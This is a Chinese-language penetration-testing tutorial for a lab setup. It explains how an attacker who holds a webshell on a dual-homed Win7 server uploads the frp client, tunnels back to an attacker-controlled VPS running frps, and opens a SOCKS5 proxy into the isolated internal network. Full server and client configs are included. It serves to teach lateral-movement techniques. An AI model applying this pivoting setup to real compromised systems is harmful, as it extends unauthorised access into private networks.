前言#

內(nèi)網(wǎng)穿透，代理技術的聯(lián)系與區(qū)別？

我個人感覺在內(nèi)網(wǎng)滲透的時候它們之間的界限很模糊，其目的都是為了突破內(nèi)網(wǎng)訪問的限制。內(nèi)網(wǎng)穿透允許將內(nèi)網(wǎng)的服務暴露給公網(wǎng)，代理服務器充當客戶端和目標服務器之間的中介，通過代理服務器來轉發(fā)網(wǎng)絡請求和響應。

環(huán)境搭建#

攻擊機可以訪問web服務器win7并且已經(jīng)獲取權限拿到shell，但是win7通過雙網(wǎng)卡將內(nèi)網(wǎng)和外網(wǎng)隔離，所以攻擊機不可以直接訪問內(nèi)網(wǎng)的Windows 2008主機。

目標：

通過vps搭建frps服務端
win7作為跳板機運行frpc客戶端將內(nèi)網(wǎng)轉發(fā)到vps上
vps反向代理
通過vps的socks代理訪問內(nèi)網(wǎng)

frp反向代理#

疑問：既然拿到了服務器的shell，為什么不拿服務器的shell直接入侵內(nèi)網(wǎng)？

我的理解，其一是webshell的功能較少，通常是作為一個上傳工具的通道。其二是webshell通常是通過采用http協(xié)議傳輸，沒有建立穩(wěn)定的tcp連接，難以應對內(nèi)網(wǎng)的滲透時復雜的網(wǎng)絡要求。

所以就需要使用一下專業(yè)的內(nèi)網(wǎng)滲透工具來保證內(nèi)網(wǎng)滲透的過程中始終保持一個較好的網(wǎng)絡狀態(tài)。

frp就是這一個非常實用的工具，frp是一個專注于內(nèi)網(wǎng)穿透的高性能的反向代理應用，支持TCP、UDP、HTTP、HTTPS等多種協(xié)議，且支持P2P通信。可以將內(nèi)網(wǎng)服務以安全、便捷的方式通過具有公網(wǎng)IP節(jié)點的中轉暴露到公網(wǎng)。

frp項目地址：https://github.com/fatedier/frp

首先分別準備linux平臺和windows平臺的frp工具（版本需要保持一致）：

將liunx平臺frp上傳至liunx vps搭建frps服務端，需要用到的文件有兩個frps服務端程序和frps.ini服務端配置文件，需要重點關注frps.ini文件：

默認只有服務端綁定的端口，可以添加其他配置項目：

[common]
bind_addr = 0.0.0.0  #服務端的ip地址
bind_port = 7000  #服務端的端口號


dashboard_port = 7500  #服務端儀表盤界面的訪問端口
dashboard_user = admin  #儀表盤的用戶名
dashboard_pwd = 123456  #儀表盤的用戶密碼

保存配置文件，執(zhí)行./frps -c ./frps.ini命令啟動frp服務端，等待客戶端連接：

服務搭建成功，接下來將windows平臺的frpc通過webshell上傳至服務器win7，同樣需要配置frpc.ini文件：

配置socks5代理：

[common]
server_addr = ip  #服務器的地址
server_port = 7000  #服務器監(jiān)聽的端口號
tls_enable = ture  #啟用tls加密連接


[plugin socks]
type = tcp  #指定協(xié)議類型為tcp
plugin = socks5  #使用的插件為socks5
remote_port = 46075  #指定socks5代理的遠程端口
use_encryption = true
use_compression = true